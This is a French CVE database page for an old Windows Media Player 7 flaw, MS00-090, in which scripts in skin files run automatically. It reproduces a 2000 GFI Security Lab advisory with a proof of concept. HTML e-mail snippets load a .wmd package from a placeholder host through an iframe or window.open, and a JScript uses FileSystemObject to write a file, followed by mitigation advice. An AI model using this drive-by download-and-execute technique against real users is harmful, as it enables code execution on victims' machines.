Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Microsoft Windows Media Player 7 executes scripts in custom skin (.WMS) files, which could allow remote attackers to gain privileges via a skin that contains a malicious script, aka the ".WMS Script Execution" vulnerability.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 4.6 | AV:L/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 20424
Date de publication : 2000-11-21 23h00 +00:00
Auteur : Sandro Gauci
EDB Vérifié : Yes
----[Title:
[ GFISEC23112000 ] Microsoft Media Player 7 allows executation of
Arbitrary Code
----[Published:
23.NOV.2000
----[Vendor Status:
Microsoft has been informed and we have worked with them to release
a patch.
----[Systems Affected:
Windows ME (WMP7 is installed by default)
and 95,98 NT and 2000, using:
* Windows Media Player 7
and
* Internet Explorer 3+,
* Outlook Express 2000,
* Outlook Express 98,
* Outlook 2000,
* Outlook 98
* possibly all other HTML and/or
javascript enabled e-mail clients.
----[The problem:
GFI, developer of email content checking & network
security software, has recently discovered a security flaw
within Windows Media Player which allows a malicious user
to run arbitary code on a target machine as it attempts to
view a website or an HTML E-mail.
The problem is exploited by embedding a javascript (.js) file within a
Media Player skin file (.wmz) which can also be embeded in a Windows Media
Download file (.wmd). This does not require the user to run any attachments
since the Media Player file is automatically executed using a iframe tag
or a window.open() with in a <script> tag.
----[Proof of concept Exploit:
<Embedded within an HTML file or e-mail>
E-mail Example 1.
<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
alert('This exploit will now open a new window\n
and automatically download the wmd file\n
and execute it. This will create a file named\n
gfiseclab.txt in your C:\\');
window.open(theURL,winName,features);
}
//-->
</script>
</head>
<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</Embedded within an HTML e-mail>
E-mail Example 2.
<html>
<body>
<script>
alert('This exploit will now open a new window \n and automatically download
the wmd file \n
and execute it. This will create a file named \n gfiseclab.txt in your
C:\\')</script>
<iframe src="http://website/test.wmd";></iframe></body>
</html>
-------------------------------------
test.wmd is a compressed zip file which contains the following files:
* test.asx: meta file which points to an mpg file and
the exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.
test.wmz is also a compressed zip file containing:
* test.js: our javascript which contains the following code
************************************
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload(){
playAgain();
}
************************************
* test.wms: another metafile which calls test.js
-------------------------------------
----[Solution:
For e-mail the best solution is to apply filtering on incoming e-mails via
the SMTP server to filter WMD and WMZ files, disable javascript iframe tags,
meta refresh tags and possibly ActiveX tags. This means that users should
not worry about receiving malicious email and spreading worms etc.
Consider unregistering .wmd and .wmz so from being associated with Media
Player 7 until a vendor patch is applied. Procedure:
In Windows Explorer click on View>Options>File Types and delete the
following entries:
* Windows Media Player Skin Package.
* Windows Media Player Download Package.
This should provide some better protection.
----[Reference:
http://www.gfi.com/press/memp7exploitpr.htm
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
----[Contact Information:
Sandro Gauci
GFI Security Lab
sandro@xxxxxxx
http://www.gfi.com
source: https://www.securityfocus.com/bid/1976/info
Windows Media Player is an application used for digital audio, and video content viewing.
It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.
Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user.
Products Mentioned
Configuraton 0
Microsoft>>Windows_media_player >> Version 6.4
- Microsoft>>Windows_media_player >> Version 6.4 (Open CPE detail)
Microsoft>>Windows_media_player >> Version 7
- Microsoft>>Windows_media_player >> Version 7 (Open CPE detail)
Références
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-090
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
